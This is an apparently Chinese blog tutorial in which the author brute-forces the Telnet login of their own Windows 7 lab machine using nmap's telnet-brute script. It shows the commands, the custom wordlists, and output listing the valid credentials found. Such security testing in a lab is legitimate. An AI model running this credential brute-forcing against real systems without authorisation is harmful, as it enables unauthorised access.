2. 程式人生 > >【20171115中】nmap 使用腳本爆破telnet密碼

【20171115中】nmap 使用腳本爆破telnet密碼

阿新 發佈:2017-11-15
pts style logs images lan clas ip add bbbb 提升

今天老黑走出了低谷,設置了懲罰機制後效率提升了很多,現在寫一個使用nmap檢測目標主機漏洞和利用漏洞的文章,話不多說,直接開始!

0x01:環境介紹

  主機A:系統 - kali2017,IP - 192.168.1.104

  主機B:系統 - win7x64,IP - 192.168.1.103

  使用主機A掃描並攻入主機B

0x02:確認主機B開啟了telnet的23端口

  主機B沒有開啟,我自己開啟一下。

  s1:控制面板 -> 程序 -> 打開或關閉windows程序 -> 選中下圖選項框,點擊確認後重啟系統。

技術分享

  s2:確認計算機telnet服務是否已經開啟。打開計算機右擊 -> 管理 -> 服務和應用程序 -> 服務 -> 找到Telnet服務,並將其開啟服務和設置自動

0x03:在主機A掃描確認主機B是否開啟了23端口

  技術分享

0x04:進行爆破

  s1:參考官網了解,爆破命令如下

nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

  s2:制造自己的myusers.lst和mypwds.lst

    老黑將自己的賬號AAAA放在myusers.lst中,如下:

    

AAAA
AA22
ASDFSA
SDSDD

    將自己的密碼BBBB放在mypwds.lst中,如下:

BBBB
BB23
DFASDFA
SADFAA

    根據主機A的環境,調整命令,如下:

nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

  s3:執行命令,等待結果

root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST
Nmap scan report for promote.cache-dns.local (192.168.1.103)
Host is up (0.091s latency).

PORT   STATE SERVICE
23/tcp open  telnet
| telnet-brute: 
|   Accounts: 
|     AAAA:BBBB - Valid credentials
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

  技術分享

0x05:telnet登陸主機B,WELL DONE!

技術分享

【20171115中】nmap 使用腳本爆破telnet密碼

相關推薦

20171115nmap 使用爆破telnet密碼

pts style logs images lan clas ip add bbbb 提升 今天老黑走出了低谷,設置了懲罰機制後效率提升了很多,現在寫一個使用nmap檢測目標主機漏洞和利用漏洞的文章,話不多說,直接開始! 0x01:環境介紹   主機A:系統 - k

前端基礎動態與JSONP

技術 動態生成 查詢 pen 想想 一行代碼 art 構建 dom元素 博主入職兩個月了,越來越感受到打好基礎對於前端工程師的重要性,在向著狂拽酷炫的框架&構建工具狂飈之前,必須有一個堅實的基礎打底,才不至於輕易翻車。所以博主最近一直在惡補《JS高級程序設計》,發現

20171025alert(1) to win 渲染自建

rip doc function 最簡 turn cti fire func cape 遊戲誤人生,一下午玩了將近四個小時的三國殺,後悔不已,然後重新拾起xss challenge,突發奇想,自己構建渲染後的html。 從最簡單的開始。 自動檢測htm

shell執行時報"bad interpreter: Text file busy"的解決方法

and files hat scrip proc nbsp comm this rep 1)問題現象: 在ubuntu下執行以下腳本( while_count),報錯: -bash: ./while_count: /bin/bash: bad interpreter: T

Mac下命令行發郵件搭配php(shell_exec...)等語言,輕松發郵件,告別各種依賴庫

-1 mtp ima .cn 令行 輕量 -- 語言 郵件   用到的是msmtp,一個smtp客戶端,比sendmail,postfix更加輕量。用自己的QQ郵箱(163...)發郵件的話,很適合。   Mac下安裝很簡單,一句話:brew install msmtp  

樹莓派智能門鎖使用控制GPIO來開鎖4

fig tom span 測試 vnc pre .com shu 打開 假定你已經通過此文章或者其他方式完成了樹莓派的基本配置 我們通過VNC View連接到樹莓派查看一下~ 太小了~~看著不舒服。。。改變一下分辨率: 樹莓派設置分辨率 根據上面文章;我們設置一下分辨率

2018-11-14初級算法挑戰

lse 多余 返回 urn 分享 factor str you true 1.翻轉字符串算法 1 function reverseString(str) { 2 var res=str.split("").reverse().join(""); 3 re

高效率shell一鍵安裝Tomcat服務

.com all 免費 8.0 html process sed root用戶 $path 腳本環境 1.linux centos 7或redhat 62.光盤鏡像文件已掛載3.系統在可連接外網的環境中4.先下載jdk和tomcat軟件包百度雲鏈接提取碼:89be 實驗

Linux執行shell的4種方法

linux shell 這篇文章主要介紹了Linux中執行shell腳本的4種方法總結,即在Linux中運行shell腳本的4種方法,需要的朋友可以參考下。bash shell 腳本的方法有多種,現在作個小結。假設我們編寫好的shell腳本的文件名為hello.sh,文件位置在/root/bin目錄中

斯坦福tensorflow課程 課後作業代碼更新

solution lob cor exc ons build ops 代碼 eth Assignment1   Problem1:     Ops excercises   Problem2:     Task1:Improving the accuracy of our

CSS - 移動端 常見小bug整理與解決方法總結更新

mic ros class clas 問題 像素 css strong 常見問題 常見問題總結與整理系列~ 1. border一像素在手機上看著有點粗的問題: 原理是因為:1px在手機上是使用2dp進行渲染的 換成 border: 0.5像素?是不行的!

Linux自動安裝

linux腳本自動安裝如何讓你的主機自動的完成安裝,自動的回答系統提出的問題,編寫自動安裝腳本即可實現,如下將詳細解釋自動腳本安裝方法。systemd-config-kickstart ##自動應答腳本制作工具安裝成功,在安裝過程中systemd-config-kickstart 將做出腳本應答進行選擇語言

《Linux運維架構師課程 - 門徒班》招生

linux運維課程簡介 阿良的課程內容主要以企業核心技術為講解對象,避免過多在企業中很少用的技術,從而減少學習負擔,這樣就可以把精力主要花費在更重要的技術上, 而不像其他培訓機構那樣,講很多高大上的技術名詞,其中可能50%的知識在工作中都用不到,學員抓不住重點,時間長了就忘了。 所以,阿良的教學模

《從Docker到Kubernetes企業應用實戰課程 - 集訓班》招生

docker課程簡介 本課程是一個Docker技術集訓班,實戰為主,幫助你快速掌握這門主流的技術,能勝任Docker相關工作,同時為簡歷添上靚麗一筆。 Docker是一個開源的應用容器引擎,將項目及依賴打包到一個容器中,然後發布到任意Linux服務器上。 Docker主要特點:開箱即用,快速

傳奇版本自動穿背包的裝備

bre 自動 衣服 適用於 box body bsp ssa 裝備 傳奇版本自動穿背包中的裝備腳本 適用於傳奇一條龍開區功能:自動穿背包中的裝備,TakeOn 物品名稱 裝備位置裝備位置:0 = 衣服 1 = 武器 2 = 蠟燭 3 = 項鏈 4 = 頭盔 5 = 左手鐲

鏈接器——鏈接

進行 src 文件中 ima vpd 技術分享 所有 鏈接 可執行 鏈接腳本 鏈接器根據說明具體的原則完成具體的工作?答案是:鏈接腳本。 1鏈接腳本的意義 鏈接腳本用於描述鏈接器處理目標文件和庫文件的方式1.合並各個目標文件中的段2.重定位各個段的起始地址3.重定位各個符號

Modelsim使用TCL編寫do文件實現自動化仿真

簡單 ilo warning truct 語言 .com tps fpga 仿真 通常我們使用Modelsim進行仿真,是通過圖形界面點點點來進行操作,殊不知Modelsim完美支持TCL腳本語言及批處理命令do文件。簡單來說就是從你修改完代碼後到你重新編

BZOJ 1269 [AHOI2006]文編輯器editor

c++ AC clas delete pen back 不知道 https 每次 【鏈接】 我是鏈接,點我呀:) 【題意】 在這裏輸入題意 【題解】 /* 【move k】 指令。直接 把pos改成k.表示改變光標位置 【insert n

shell執行python並接收其返回值的例子

erl 結果 port ria 需要 deb def ID pri 1.在shell腳本執行python腳本時,需要通過python腳本的返回值來判斷後面程序要執行的命令 例:有兩個py程序 hello.py 復制代碼代碼如下: def main(): pri

shell執行shell

執行 info 分享 $1 所在 結果 com echo 目錄 1、a.sh #!/bin/sh name="hello" ./b.sh $name 2、b.sh(這裏把b.sh與a.sh放在同一目錄下,便於演示) #!/bin/shecho "parameter